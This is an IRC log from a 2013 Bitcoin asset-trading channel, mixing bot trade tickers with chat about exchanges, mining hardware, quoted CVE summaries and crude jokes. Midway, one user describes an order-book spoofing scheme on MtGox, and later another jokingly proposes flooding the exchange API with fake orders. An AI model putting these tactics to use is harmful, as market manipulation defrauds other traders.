[S.MPOE] 12045 @ 0.00071572 = 8.6208 BTC [-] May 02 20:59:38 [MPEX] [S.MPOE] 9755 @ 0.00071057 = 6.9316 BTC [-] May 02 21:03:08 [BTCTC] [BTC-BOND] 15 @ 0.01023 = 0.1535 BTC [-] May 02 21:04:59 i was just discussing password length vs stupid @ symbol instead of a schemes May 02 21:05:15 making passwords too difficult means i leave sticky note May 02 21:05:31 2FA or 12+ characters is better May 02 21:07:29 [BTCTC] [COGNITIVE] 3 @ 0.26 = 0.78 BTC [+] May 02 21:08:05 [HAVELOCK] [SDICE] 1 @ 0.31189999 BTC [+] May 02 21:08:54 after a shitty day friedcat made it all good by providing me with the tracking nr for my asicminer order May 02 21:09:36 now I want to make someone else's day shitty by gloating, and it's all good May 02 21:09:49 yes yes May 02 21:10:13 but I still need to deliver some hardcore bugfixes May 02 21:10:35 clients up my ass May 02 21:11:28 I know it's not really a fantastic investment in terms of ROI, more a piece of bitcoin history May 02 21:12:14 or a worthless piece of shit in a couple of months May 02 21:12:34 but it brings joy to a nerd indeed May 02 21:12:38 so good for you. May 02 21:12:57 thanks MP May 02 21:13:46 that joy will switch to fear and panic trying get the thing working May 02 21:14:05 then regret May 02 21:14:15 and then back to baseline May 02 21:14:37 sure, but it doesn't look like it will be like a usb stick you plug in May 02 21:15:25 I'll need to mutilate a PSU to power it up May 02 21:16:07 I prefer software, you can always undo your fuckups May 02 21:16:51 work hard, play hard :) May 02 21:17:37 but I'm gonna take a rest see you guys laters May 02 21:17:59 thx May 02 21:18:15 pop pop May 02 21:18:17 ;;goxlag May 02 21:18:18 MtGox lag is 10.6201 seconds. During this time, light travels 0.0212825614914 AU. You could have sent a bitcoin ten times between Earth and Moon (0.0257 AU). May 02 21:19:55 [BTCTC] [PAJKA.BOND] 239 @ 0.1 = 23.9 BTC [-] May 02 21:26:51 [BTCTC] [PAJKA.BOND] 250 @ 0.1 = 25 BTC [-] May 02 21:27:38 [BTCTC] [PAJKA.BOND] 6 @ 0.105001 = 0.63 BTC [+] May 02 21:27:47 [BTCTC] [PAJKA.BOND] 10 @ 0.105 = 1.05 BTC [-] May 02 21:31:53 ok... so I've been examing the the gox depth messages... I just watched some guy add and remove thousands of .01 BTC quotes from $1 to $3 in $0.001 price increments, creating a shitload of lag doing it - fucking bullshit - why can't gox police their own fucking exchange! May 02 21:32:50 because thats life May 02 21:32:53 and thats how exchanges work May 02 21:32:57 they dont need to police it May 02 21:33:02 they need to be able to handle the load May 02 21:33:14 [MPEX] [O.USD.C245T] 20 @ 0.05099501 = 1.0199 BTC May 02 21:33:21 they should charge for that kind of thing - plenty of real world exchanges do charge for cancellation of unfilled ordres May 02 21:34:22 yep - ECN's charge for excessive messaging May 02 21:34:39 gox should learn from them May 02 21:35:25 heh. May 02 21:35:26 no shit they don't - almost no one in bitcoin has come from anything other than a geek background May 02 21:35:45 guruvan actually most everyone from finance is here. May 02 21:35:51 i think geeks may be a minority on this chan May 02 21:36:12 im just a css kid May 02 21:36:26 oh yes - in this channel there might be a difference - lol hang out in any of the other ones ;) May 02 21:37:00 -assets doesn't lose it when BTC/"USD takes a shit - the freakout in other channels shows the truth May 02 21:37:42 freak outZ! May 02 21:39:56 yeah - thank god for that - I had to leave other chans because I'm too "offtopic" May 02 21:39:59 FREaK!!! May 02 21:40:03 out with your tits out May 02 21:40:11 heheh May 02 21:40:19 o look, mod6 is alive May 02 21:40:34 :] May 02 21:40:46 was kinda sick earlier this week :/ May 02 21:40:54 wb May 02 21:41:01 thx. May 02 21:41:17 omg and it /snowed/ again here yesterday, like wtf!? shit is getting old! May 02 21:41:31 mod6 god hates you May 02 21:41:32 fuck snow May 02 21:41:38 haha jcpham May 02 21:41:39 he shits frozen water on you May 02 21:41:47 I want an army like this .... http://www.asctec.de/uav-applications/research/applications/applications-2/swarming/ May 02 21:42:09 hopefully you don't measure your typical snowfall in FEET like we do here mod6 (or meters) May 02 21:42:10 1.6k sell wall at 104 May 02 21:42:12 oh and jcpham, i did get an email about the other 1/2 of my coinabul order shipping yesterday. May 02 21:42:31 So... apparently that's happening. Will give another update after I receive. May 02 21:42:45 nothing here May 02 21:42:50 14 ounces May 02 21:42:54 no contact May 02 21:43:09 coingenuity gonna get bitchslapped May 02 21:43:18 :) May 02 21:43:25 guruvan: well, typically we get a range. its not like mountain snowfall though. sometimes 1-2" sometimes 8-12"... May 02 21:43:35 I don't think I'd buy from them after the troubles I've seen May 02 21:43:48 guruvan u may be right May 02 21:43:55 i've seen and seen and seen too May 02 21:43:56 thank god for that mod6 - here I usually see 2-3 ft each snowfall May 02 21:44:26 jcpham: not to mention that if he can't fill the order refunds come in fiat, not in the original paid BTC price May 02 21:44:44 jcpham: ahh, hmm. i placed my orders on the 9th.. my slv one got here pretty quick. but the gld order took until yesterday to ship apparently. May 02 21:45:29 not sure if the recent physical gld buying frenzy played a roll in that, or if it was the btc bubble pop that played a roll there. but 60 days i guess is my max limit. May 02 21:45:34 i placed my order around $250/ per btc May 02 21:45:37 s/roll/role/ May 02 21:45:38 which was some time ago May 02 21:46:11 hmm. yeah - I think I'll buy elsewhere May 02 21:46:27 when it's back to $25 a coin May 02 21:46:35 $250 May 02 21:47:50 My silver order was /pretty/ though. May 02 21:48:00 So I was pretty happy with that. May 02 21:48:42 I usually just pay cash at a local place around here, but when it was @ $260/btc ea. I thought, wth, give these guys a shot and see what happens. May 02 21:51:53 the BTC makes it so easy to want to do it that way - but. ...I know I certainly offer refunds to people in the currency they paid me (in the same amount as was paid) May 02 21:53:01 Yeah, if I pay in BTC, I demand to be paid back in BTC. May 02 21:53:09 The "encrypt wallet" feature in wxBitcoin and bitcoind 0.4.x before 0.4.1, and 0.5.0rc, does not properly interact with the deletion functionality of BSDDB, which allows context-dependent attackers to obtain unencrypted private keys from Bitcoin wallet files by bypassing the BSDDB interface and reading entries that are marked for deletion. May 02 21:53:10 lmao May 02 21:53:36 whoops lol May 02 21:53:39 Unspecified vulnerability in bitcoind and Bitcoin-Qt before 0.4.7rc3, 0.5.x before 0.5.6rc3, 0.6.0.x before 0.6.0.9rc1, and 0.6.x before 0.6.3rc1 allows remote attackers to cause a denial of service (process hang) via unknown behavior on a Bitcoin network. May 02 21:53:44 http://www.cvedetails.com/vulnerability-list/vendor_id-12094/product_id-22744/year-2012/Bitcoin-Bitcoind.html May 02 21:53:47 pretty funnystuff May 02 21:54:22 mod6: IIRC he'll refund in BTC, after converting to the now current exchange rate. :P May 02 21:54:47 The alert functionality in bitcoind and Bitcoin-Qt before 0.7.0 supports different character representations of the same signature data, but relies on a hash of this signature, which allows remote attackers to cause a denial of service (resource consumption) via a valid modified signature for a circulating alert. May 02 21:54:49 ahahaha May 02 21:56:18 guruvan: yeah, I'm ok will refunds minus the fees, but not after a conversion to some fiat. May 02 21:57:01 I'd probably negrate for stuff like that. May 02 21:57:31 things one finds reading noob bashing : May 02 21:57:33 for x in $(eval echo {1..10000}) May 02 21:58:07 It's like, hey, if I place an order, and something fucks up: i.e. can't get delivery, order is cancelled, I'd expect full refund of BTC, perhaps minus small fee. May 02 21:58:19 you may be surprised. May 02 21:59:35 But I value BTC pretty much higher than most other things that I could purchase with it, which is why I don't spend much of it. May 02 21:59:41 well, aside from the trust level. May 02 21:59:53 that's always an issue -- too many fucking scammarz. May 02 22:01:04 but if i want to pay 2.3 magical swords for your warez, and you can't deliver, I expect to get my 2.3 magical swords back. May 02 22:13:27 I've been crazy busy though trying to keep up with work and btc-land stuff. I made few line changes to the vwap & depth perl scripts for bitotter last-night. And I've been testing some changes to the trade script (bitotter.pl) for about 2 weeks, just making sure all works good before the next checkin with that. May 02 22:14:14 As far as the android app, I've been working on the encryption stuff, which has been going ok -- did a bunch of code clean out etc. May 02 22:15:19 smickles & thestringpuller signed up to help but they're too busy or w/e so I think I'm just back to on-my-own on that one. May 02 22:15:56 I'm pretty excited because I think I finally am getting some sound changes in there for the encryption piece. May 02 22:17:09 I looked through the APG and that thing is pretty awesome. But too bad it just can't do what we need for now. It'd be great if another droid app could just call enc() or dec(), shovel it some data and a key id and get back what you need, but it doesn't do that kidna thing yet. May 02 22:17:22 [BTCTC] [ASICMINER-PT] 1 @ 1.29994 BTC [+] May 02 22:17:44 So I'm on the roll-your-own type deal for now. Still fun to work on though when I have time. May 02 22:18:05 Contracts that I'm doing now are pretty much teh sux. May 02 22:18:35 TAT.ASICMINER is now live! https://bitfunder.com/asset/TAT.ASICMINER May 02 22:19:02 [BTCTC] [ASICMINER-PT] 1 @ 1.29995 BTC [+] May 02 22:19:03 wd May 02 22:19:45 [BTCTC] [ASICMINER-PT] 1 @ 1.3 BTC [+] May 02 22:19:50 [BTCTC] [ASICMINER-PT] 1 @ 1.308 BTC [+] May 02 22:20:29 [BTCTC] [ASICMINER-PT] 1 @ 1.3089 BTC [+] May 02 22:22:04 [HAVELOCK] [HIM] 1 @ 1.92 BTC [+] May 02 22:22:31 [BTCTC] [PAJKA.BOND] 3 @ 0.1066 = 0.3198 BTC [+] May 02 22:23:41 ThickAsThieves: still buying AM? May 02 22:24:32 [BTCTC] [PAJKA.BOND] 20 @ 0.1099 = 2.198 BTC [+] May 02 22:27:29 dub, depends how the next few days ago May 02 22:27:35 i bought a lot May 02 22:27:37 and lined up more May 02 22:27:45 but if things go well May 02 22:27:48 mircea_popescu: that girl making .9 BTC was awesome btw lol May 02 22:27:53 i will def be looking for more offmarket sellers May 02 22:31:36 o and also, many lulz I had reading that one guy from finlands "open diary" or whatever the hell it is.. May 02 22:33:29 [BTCTC] [PAJKA.BOND] 89 @ 0.1099 = 9.7811 BTC [+] May 02 22:33:47 mod6 he's serious May 02 22:34:00 he deleted all of my comments that were troll-worthy May 02 22:34:07 he means business about his supernode May 02 22:34:43 HAHA May 02 22:35:53 so now after re-reading that thread May 02 22:36:02 i think i understand nothing of finnish culture May 02 22:36:04 [HAVELOCK] [VTX] 15 @ 0.4804 = 7.206 BTC [+] May 02 22:36:15 language/ideas/whatever May 02 22:36:26 that guy looks like Moby May 02 22:37:23 mod6 yeah srsly. awesome chick May 02 22:37:55 jcpham i agree. the finns are pretty badass. May 02 22:38:24 now that i realize he is serious i feel confused about my own ideas May 02 22:39:10 his thread makes me feel like less of a man May 02 22:39:19 aghaha what May 02 22:41:33 http://polimedia.us/dtng/c/src/136747439634.gif May 02 22:41:36 water based engine May 02 22:42:16 they look kinda like horsies wagging their tails May 02 22:42:46 uyou got it May 02 22:47:07 [BTCTC] [PAJKA.BOND] 4 @ 0.1099 = 0.4396 BTC [+] May 02 22:48:32 @CharlieShrem 55m WOW! 2.5% of ALL #Reddit #Gold was purchased via #Bitcoin Good work #Coinbase May 02 22:48:35 um... 2.5% ? srsly ? May 02 22:48:36 lol May 02 22:50:02 New feature added to bitfunder assets. https://bitcointalk.org/index.php?topic=130117.msg2008531#msg2008531 May 02 22:50:48 can;t hurt. May 02 22:52:02 It was mostly done months ago. May 02 22:52:10 took 20 min to make it usable May 02 22:52:17 so, how low do you think BTC will go this weekend? May 02 22:52:20 still have to enable the sorting, and categories May 02 22:52:24 90s May 02 22:52:36 $1's for a week I hope. ;) but not likely May 02 22:52:45 i'm sort of thinking $60's. no? May 02 22:53:06 i don't think so. May 02 22:53:31 http://blockchained.com/depth_mtgox_15d.png May 02 22:53:36 asks on the rise May 02 22:53:48 if it breaks ninety, we could see low 80's, but i think 90 will hold... for now May 02 22:54:17 cool, where can you get those depth charts. are they free? May 02 22:54:19 that is a great chart, btw - I look at it all the time May 02 22:54:39 theres a bunch of charts on differenet sites May 02 22:55:06 http://www.quickmeme.com/meme/3u7ql0/ May 02 22:55:10 orkaa has some nice ones May 02 22:55:41 lol supernode May 02 22:55:53 moby lol May 02 22:55:54 this is totally wagner v2.0 May 02 22:56:23 haha he looks insane with that silver suit on May 02 22:56:26 all he needs to do is come out as gay. kinda hoping he will for great drama. May 02 22:58:07 [BTCTC] [B.YABMC] 10 @ 0.0135 = 0.135 BTC [-] May 02 22:58:35 maybe i should open a fractional supernode asset May 02 22:58:41 for the peasants May 02 23:03:40 [BTCTC] [PAJKA.BOND] 250 @ 0.1 = 25 BTC [-] May 02 23:04:26 fractional supercock May 02 23:07:20 haha May 02 23:08:31 oh and moby apparently gave justin bieber a Casascius coin!? May 02 23:08:59 why in the world would you give a fuckwit like JB any satoshi at all? May 02 23:10:33 kakobrekla https://bitcointalk.org/index.php?topic=192122.msg2008636#msg2008636 May 02 23:10:35 hiw about that May 02 23:10:44 saw dat May 02 23:10:48 pretty cool May 02 23:10:52 yup May 02 23:11:09 i thought the bastards will hide up May 02 23:19:13 here come another slew of thousands of .01 bids < $3.... May 02 23:20:25 ridiculously manipulative... May 02 23:21:24 can't they just shut this guy off... May 02 23:21:51 ;;goxlag May 02 23:21:51 MtGox lag is 73.186028 seconds. During this time, light travels 0.14666398068 AU. You could have sent a bitcoin ten times between Jupiter and Callisto (0.12567 AU). May 02 23:21:56 o it works May 02 23:21:57 I have a pretty good idea of how this scam works on gox... May 02 23:22:21 it starts with the price about to break out one way or the other May 02 23:22:33 [MPEX] [S.DICE] [PAID] 1,795.55981375 BTC to 50`000`000 shares, 3591 satoshi per share May 02 23:22:56 yeah! May 02 23:23:45 the perp gets into the trend with large market order, with a limit order further out to reverse. May 02 23:24:16 then stacks the book at the bottom to create lag, giving the impression that hugh market buy orders are coming in... May 02 23:24:50 others jump on the band wagon only to execute against his sell order May 02 23:25:05 o hey nice, s.dice May 02 23:26:07 well it's certainly doable, but unethical May 02 23:26:30 pgp2 let others fucking learn already to give up mommentum trading. May 02 23:26:38 every fuckwit on the intenret is a daytrader nao May 02 23:26:39 how ? May 02 23:26:46 "o its ezzy man just follow eveeryone else" May 02 23:27:30 hey, if camwhores can do it i can too! May 02 23:27:52 haha May 02 23:28:01 lol May 02 23:28:19 lol May 02 23:28:27 kakobrekla are your tits bigger? May 02 23:28:38 this should be his stage name May 02 23:28:43 Bits Tigger May 02 23:28:56 word May 02 23:30:01 excellent porn name May 02 23:30:21 has a certain... ring to it... May 02 23:30:43 http://new.livestream.com/accounts/3824848/events/2074798 May 02 23:30:49 lol May 02 23:36:01 [BTCTC] [COGNITIVE] 1 @ 0.25 BTC [-] May 02 23:36:39 @danielleneftin 30 Apr At a BITCOIN millionaires house. Charlie shows me his new BITCOIN-vodka company which happens to be… http://instagram.com/p/Yu79a7Mtq2/ May 02 23:36:43 ATM will be DOA - no market for this yet... May 02 23:36:43 the chick is a Vice intern :D May 02 23:37:02 pgp2 there'd be a huge market, but it's not something random bloke with fiddy bux can touch May 02 23:39:11 agreed - but this solution is too ambitious May 02 23:39:48 yeah. May 02 23:39:51 agreed. May 02 23:40:07 o btw, did you see http://trilema.com/2013/mpex-one-year-of-dividends/ ? May 02 23:40:46 much easier for wallet company to team up with a bank to allow one way conversion of bitcoin to cash. May 02 23:41:14 with existing ATM around the world May 02 23:41:39 ^ May 02 23:41:45 exactly. May 02 23:42:02 problem is, bitcoin entrepreneur is a geek. doth not want to go out there and get a deal closed May 02 23:42:10 wants to lock up in basement and write moar code nobody reads. May 02 23:42:29 hey im in 2nd floor May 02 23:42:54 lol May 02 23:43:00 cant go higer really May 02 23:43:03 if i want a roof May 02 23:43:17 rates are overroofed. sky's the limit babeh May 02 23:43:22 http://p.bfram.es/finland-be-afraid-be-very-afraid.jpg May 02 23:43:26 the implementation is is too damn complicated - will only appeal to other geeks May 02 23:44:13 mircea_popescu: i think you're projecting... basement... lock up.... May 02 23:44:25 now that can also be true May 02 23:44:28 [BTCTC] [PAJKA.BOND] 2 @ 0.1099 = 0.2198 BTC [+] May 02 23:44:44 thanks for the link to your architecture post - cool stuff May 02 23:44:44 [MPEX] [S.MPOE] 8750 @ 0.00072562 = 6.3492 BTC [+] May 02 23:44:56 aha ? May 02 23:45:25 did the girl link you to something ? May 02 23:45:55 well mpoe-pr - http://trilema.com/2013/mpex-tech-stuff/ May 02 23:46:28 ah ok. May 02 23:46:41 well... my pleasure then :) May 02 23:54:05 [HAVELOCK] [HIM] 1 @ 1.8801 BTC [-] May 03 00:05:24 [BTCTC] [BITVPS] 1 @ 0.00172 BTC [+] May 03 00:14:02 [BTCTC] [PAJKA.BOND] 50 @ 0.1099 = 5.495 BTC [+] May 03 00:15:40 !ticker btct bitvps May 03 00:15:42 [BTCT:BITVPS] 1D: 0.001 / 0.00111 / 0.001749 (3539 shares, 3.9 BTC), 7D: 0.00072 / 0.00113 / 0.001887 (3858 shares, 4.4 BTC), 30D: 0.0002 / 0.00113 / 0.00479 (12199 shares, 13.8 BTC) May 03 00:17:08 ;;calc 1000000*0.001749 May 03 00:17:09 1749 May 03 00:17:23 meh. and no dividends May 03 00:18:03 Marketing Strategy May 03 00:18:05 We are featured on multiple renown services, such as Slush's Pool and clarkmoody. May 03 00:18:06 Our main selling channel is by word of mouth from happy clients and bitcoin May 03 00:18:08 websites listing services accepting Bitcoins. May 03 00:19:48 It's not just you! http://bitvps.com looks down from here. May 03 00:19:55 RIP bitvps May 03 00:20:30 but but happy customers May 03 00:20:32 grubles was saying they're making decent dough earlier May 03 00:26:54 [BTCTC] [COGNITIVE] 4 @ 0.233 = 0.932 BTC [-] May 03 00:27:53 We're in the red currently... May 03 00:28:29 i was suspecting something like that. May 03 00:28:57 [BTCTC] [COGNITIVE] 1 @ 0.23 BTC [-] May 03 00:29:51 so is theymos doing an AMA old news yet? May 03 00:29:52 jurov hardly means "not at all" you know May 03 00:30:01 mircea_popescu you should go troll mr. themyos May 03 00:30:07 We technically turn a profit, but we bought servers to colocate. So we're in the red until all expenses are paid off. May 03 00:30:29 thestringpuller lol. im sure there's gonna be plenty of people doing it May 03 00:31:02 No man you should see what he's saying. May 03 00:31:23 tl;dr "I'm a "bitcoin god" ama." May 03 00:31:30 what another one ? May 03 00:31:42 bitcoin is like the late roman empire, every time some dood farts there's a new god May 03 00:32:02 anyway, who said : "The goys have proven the following theorem..." as the first sentence in his math lecture ? May 03 00:34:23 Uh none that I know of. May 03 00:34:53 Usually the first sentence in my lecture has been "DO THE HOMEWORK." *400 problems assigned go on the screen* May 03 00:36:40 All abandon the Bitcoin sinking ship! May 03 00:37:09 that's like... there was a paper about proposed quantum computer architecture May 03 00:37:36 that was supposed to compute all possible outcomes in many universes May 03 00:37:53 and if the result is not correct, destroy the local universe May 03 00:38:13 wait what? May 03 00:38:13 how that destroy part would be implemented, was left as "exercise to reader" May 03 00:38:16 is that a joke jurov? May 03 00:38:24 ;;bc,24hprc May 03 00:38:25 107.14 May 03 00:38:57 $last May 03 00:38:57 thestringpuller: [21:37:49] 107.14 May 03 00:39:04 $ticker May 03 00:39:08 ugh May 03 00:39:13 !last May 03 00:39:13 I prepared your canoe with cedar boughs. May 03 00:39:16 !ticker m S.MPOE May 03 00:39:18 [MPEX:S.MPOE] 1D: 0.00068342 / 0.00070227 / 0.00072562 (259949 shares, 182.55 BTC), 7D: 0.00064 / 0.00070794 / 0.00076528 (2430366 shares, 1,720.57 BTC), 30D: 0.00063322 / 0.00069982 / 0.00076528 (10115131 shares, 7,078.83 BTC) May 03 00:46:29 thestringpuller: no, completely srs: http://www.mathnews.uwaterloo.ca/Issues/mn11103/QuantumBogoSort.php May 03 00:46:55 "assume an entire universe can be destroyed in O(1)"... mathematicians, ofc May 03 00:47:07 ... May 03 00:48:42 coinbr right hand gives and left hand took away (referrals paid out and monthly fees levied) May 03 00:53:05 [HAVELOCK] [HIM] 1 @ 1.9199 BTC [+] May 03 00:54:20 the jurov giveth and the jurov taketh away May 03 00:56:37 Anyone is holding lots of FTC? I'd like to short the fuck out of em. May 03 00:57:29 well its offical, I am rich May 03 00:57:35 rich with debt May 03 00:57:57 wd! May 03 00:58:43 mircea_popescu: gimme another question to ask theymos May 03 00:58:48 lawyer just emailed, I haz new house May 03 00:59:18 thestringpuller well the obvious q is when is he getting golden unicorn server for btctalk off the donation funds May 03 01:06:05 lol May 03 01:06:51 grats on the house dub May 03 01:07:08 ty May 03 01:07:29 congrats, too May 03 01:08:11 btw, i was just asked how my llc shall be named.. and i realized i dont know May 03 01:08:56 obviously not coinbr, no such obvious connection shall be shown May 03 01:09:28 you should name it May 03 01:09:39 Pavlovian Enterprises May 03 01:09:43 Jurov and Associates, Consultancy LLC May 03 01:10:09 that's too long. maybe Jurov&Ass.Co May 03 01:10:23 [BTCTC] [ASICMINER-PT] 1 @ 1.299999 BTC [-] May 03 01:10:59 why pavlovian? after the dogs? May 03 01:13:30 lol jurov & ass.co May 03 01:13:31 how about big balls, small balls, any sized balls, ball bearing co May 03 01:13:41 dub : hairy ball bearings co May 03 01:13:53 John Q. Tumble, priproetor May 03 01:14:55 Lemmings International May 03 01:15:06 Dongs. May 03 01:15:23 oh geez May 03 01:15:32 BogoBalls LLC May 03 01:15:44 Yum! May 03 01:15:46 lol May 03 01:15:58 this shows promise May 03 01:16:24 Goxington Heavy Industries LLC May 03 01:16:28 haha May 03 01:16:47 Somewhat Hacked, Inc May 03 01:16:57 [BTCTC] [ASICMINER-PT] 2 @ 1.305 = 2.61 BTC [+] May 03 01:17:04 Butterflay Labes May 03 01:17:12 MeltedWallet May 03 01:17:21 Zhou&Gox Savings and Trust May 03 01:17:35 Where's Your Coin Now, Bitch? May 03 01:17:40 I like Butterfly Labias May 03 01:17:47 lool May 03 01:17:58 Butternut Sploosh May 03 01:18:12 Cooler Than 1 Million Bitcoins May 03 01:18:36 Bitcoin Jesus Enterprises May 03 01:18:43 Dewey, Screwem & Howe, LLP May 03 01:18:54 First Intergalactic May 03 01:19:03 More Fans & Nitrogen May 03 01:19:30 actually fan box llc might do just fine May 03 01:19:39 participate in ces 2014... May 03 01:19:49 NAT ROUTERS INC May 03 01:19:50 obv May 03 01:19:56 lol May 03 01:20:50 hahaha... automatically eligible for mpex listing May 03 01:22:47 [BTCTC] [S.BBET-PT] 20 @ 0.0017 = 0.034 BTC [-] May 03 01:24:09 [BTCTC] [S.BBET-PT] 77 @ 0.00167 = 0.1286 BTC [-] May 03 01:24:55 [BTCTC] [S.DICE-PT] 7 @ 0.003 = 0.021 BTC [-] May 03 01:24:58 [BTCTC] [S.DICE-PT] 43 @ 0.003 = 0.129 BTC [-] May 03 01:26:01 [BTCTC] [S.MPOE-PT] 10 @ 0.000656 = 0.0066 BTC [-] May 03 01:26:10 [BTCTC] [S.MPOE-PT] 150 @ 0.000655 = 0.0983 BTC [-] May 03 01:26:13 [BTCTC] [S.MPOE-PT] 10 @ 0.000654 = 0.0065 BTC [-] May 03 01:26:16 [BTCTC] [S.MPOE-PT] 10 @ 0.000652 = 0.0065 BTC [-] May 03 01:26:25 https://bitcointalk.org/index.php?topic=192122.msg2010084#msg2010084 May 03 01:26:25 [BTCTC] [S.MPOE-PT] 100 @ 0.000644 = 0.0644 BTC [-] May 03 01:26:28 [BTCTC] [S.MPOE-PT] 10 @ 0.000643 = 0.0064 BTC [-] May 03 01:26:31 http://polimedia.us/dtng/c/src/136753233381.jpg May 03 01:26:32 [BTCTC] [S.MPOE-PT] 191 @ 0.000641 = 0.1224 BTC [-] May 03 01:26:42 i declare today mp&co appreciation day May 03 01:27:44 [BTCTC] [GSDPT] 40 @ 0.0029 = 0.116 BTC [-] May 03 01:27:47 [BTCTC] [GSDPT] 88 @ 0.00281 = 0.2473 BTC [-] May 03 01:27:48 your claim might not reach further than this room tho May 03 01:27:51 [BTCTC] [GSDPT] 100 @ 0.002809 = 0.2809 BTC [-] May 03 01:27:54 [BTCTC] [GSDPT] 50 @ 0.0028 = 0.14 BTC [-] May 03 01:27:54 but I will reserve it May 03 01:27:57 [BTCTC] [GSDPT] 1 @ 0.00266 BTC [-] May 03 01:28:01 [BTCTC] [GSDPT] 72 @ 0.00262 = 0.1886 BTC [-] May 03 01:28:02 and celebrate with you May 03 01:28:04 [BTCTC] [GSDPT] 29 @ 0.00261 = 0.0757 BTC [-] May 03 01:33:16 [BTCTC] [BTC-BOND] 232 @ 0.01022 = 2.371 BTC [-] May 03 01:34:31 i'll prolly use "Last Financial&Consulting LLC" May 03 01:36:48 lol First consulting LLC is taken by some bitch, just a month ago May 03 01:37:47 Next FC LLC May 03 01:38:10 yeeh. 3rd of May! MP appreciation day! May 03 01:41:24 hi guys, who do you think in this room has been into crypto-currency the longest? May 03 01:41:58 okay, i guess that was a lame subject... i'm just bored waiting for the next fall. May 03 01:41:58 nanotube May 03 01:42:24 is he like a bitcoin guru? hehe May 03 01:42:33 sort of. a few others around. May 03 01:42:54 pretty much everyone except imsaguy, he's a noob. May 03 01:43:06 im a noob :( May 03 01:44:22 i have my 10 coins at $90 USD. you think ill be able to buy them at that price? May 03 01:44:46 but you have them already May 03 01:44:50 im only here because i found coins i forgot about May 03 01:44:52 :D May 03 01:45:15 i'm only here cuz SR May 03 01:45:33 >_> <_< May 03 01:45:45 ^_^ May 03 01:45:56 are there any other bitcoin IRC channels? May 03 01:46:01 many May 03 01:46:01 and i'm only here cuz MP (to show some appreciation on this day) May 03 01:46:07 jamborambo: a couple hundred. :P May 03 01:46:31 nanotube: gribble is on hundreds of channels? May 03 01:46:32 ;;ticker May 03 01:46:33 https://bitcointalk.org/index.php?topic=192661.msg2009251#msg2009251 May 03 01:46:33 BTCUSD ticker | Best bid: 105.79552, Best ask: 107.40755, Bid-ask spread: 1.61203, Last trade: 107.50000, 24 hour volume: 224799.97878543, 24 hour low: 91.11000, 24 hour high: 126.90000, 24 hour vwap: 106.76789 May 03 01:46:34 ouch May 03 01:46:48 so whats with the selling panic? May 03 01:46:49 so is rthis true ? did shtylman warn buddies so they bouight out bitcoin ? May 03 01:47:14 lol jurov May 03 01:47:33 jurov: well no, gribble is only on several dozen. :) May 03 01:47:39 but there exist hundreds May 03 01:48:03 mp, thats not really true May 03 01:48:11 while some people learned sooner than others May 03 01:48:19 the price didnt move THAT much May 03 01:48:22 and May 03 01:48:35 Roman still allowed withdraws for a time May 03 01:48:49 and I thought he also allowed cash withdraws after halting May 03 01:49:33 that last part i cant confirm May 03 01:49:41 cuz i did get all my money out beforehand May 03 01:49:49 and didnt follow things much after May 03 01:50:01 aha May 03 01:50:25 its been closed for what 2 weeks? May 03 01:50:27 people have gotten into this VERY nasty habit of pushing the truth May 03 01:50:34 probly too early to scream bloody murder May 03 01:50:35 i don't recall it being that bad a couple years ago May 03 01:50:53 he has updates on the home page May 03 01:51:06 and some people here hold him in high esteem as aperson May 03 01:51:12 i dont know the guy at all May 03 01:51:19 just glad i got out early May 03 01:51:42 coincidentally i think the BTC/USD price was like exactly what is today when he closed May 03 01:53:06 ;;ticker May 03 01:53:07 BTCUSD ticker | Best bid: 108.00001, Best ask: 108.95572, Bid-ask spread: 0.95571, Last trade: 108.00001, 24 hour volume: 225231.59405501, 24 hour low: 91.11000, 24 hour high: 126.90000, 24 hour vwap: 106.74646 May 03 01:53:12 moar crises plz May 03 01:53:18 i want all btc May 03 01:53:21 give it a day May 03 01:53:35 can we give gox a reprive also? May 03 01:53:54 let them kick around in the market a bit longer May 03 01:53:59 just get into the API and bot up a few thousand fake orders May 03 01:54:11 thatll do the trick May 03 01:54:21 reprive man reprieve May 03 01:54:35 however it's spelled, i would like to take more advantage of them May 03 01:54:53 but thats what i was helping with May 03 01:55:02 give gozx a break by giving them a hard time May 03 01:55:05 :) May 03 01:55:11 :eyeroll: May 03 01:55:32 man also this atm crap May 03 01:55:58 would love to hear about how these people plan to comply with aml/kyc May 03 01:58:39 does it take credit cards May 03 01:58:48 nice way to launder stolen ones if so May 03 02:00:22 exactly same as cash ATM? May 03 02:01:11 ;;bids 0 command May 03 02:01:12 (bids [--under] ) -- Calculate the amount of bitcoin demanded at or over . If '--under' option is given, find coins or at or under . May 03 02:02:13 ;;bids 0.1 May 03 02:02:15 There are currently 997413.16 bitcoins demanded at or over 0.1 USD, worth 16217440.6469 USD in total. | Data vintage: 0.0105 seconds May 03 02:05:06 [HAVELOCK] [HIM] 2 @ 1.92 = 3.84 BTC [+] May 03 02:18:13 >Today the registration system will be opened, and I will be able to post a list of the delegates. If they want to stay anonymous, pseudonymous or the like, I will only post what I am allowed to. I will also disclose their principals. (You know, a delegate has to file a letter of attorney for every organization (s)he represents, to be considered a legal representative. Unless (s)he just represents him/herself.) May 03 02:18:21 hehe May 03 02:18:32 lmao May 03 02:18:57 plz to link me again i seem to have lost it May 03 02:19:07 https://bitcointalk.org/index.php?topic=174620.msg2002075#msg2002075 May 03 02:19:57 please go mircea_popescu May 03 02:20:08 invite the tiberius guy too May 03 02:20:11 lol May 03 02:20:20 send all the forum trolls as "delegates" ? May 03 02:20:27 lol May 03 02:20:28 many pictures May 03 02:20:30 or take a modelling agency along and just bother the geeks May 03 02:20:46 find out who's for real and fake for us May 03 02:20:51 i can't tell anymore May 03 02:21:12 a few minutes face to face should suffice May 03 02:21:15 lol May 03 02:21:32 "Lastly, I have found it best to ignore the arrogant MP and his supposed PR person as they think they are so much better than rest of us. I have rarely seen him have anything positive to say about anything positive on this forum. If it's something that is already disparaging then he/she/they/it can usually jump on the band wagon in a positive way." May 03 02:21:37 no but srsly, he May 03 02:21:41 's gonna be the forum piper May 03 02:21:45 attract all idiots in one place May 03 02:21:51 then we talk to kim to nuke it May 03 02:22:08 kim dotcom has nukes? May 03 02:22:18 lol May 03 02:22:23 amirite May 03 02:22:53 his dong is a nuke May 03 02:23:05 if you arrived at my summit with a clan of ladies we'd take a break from the summit May 03 02:23:11 but whatever May 03 02:23:20 volodya putin has it much closer May 03 02:23:31 jurov ya but we're not ass close. May 03 02:23:32 can prolly stage submarine accident May 03 02:23:41 lol he'd do it too, nuke finland. May 03 02:24:58 kakobrekla sadly not much material there ;/ May 03 02:25:16 he keeps deleting shit May 03 02:25:28 sry, de-leeting May 03 02:26:20 you know, it'd be almost worth it to become tyrant simply 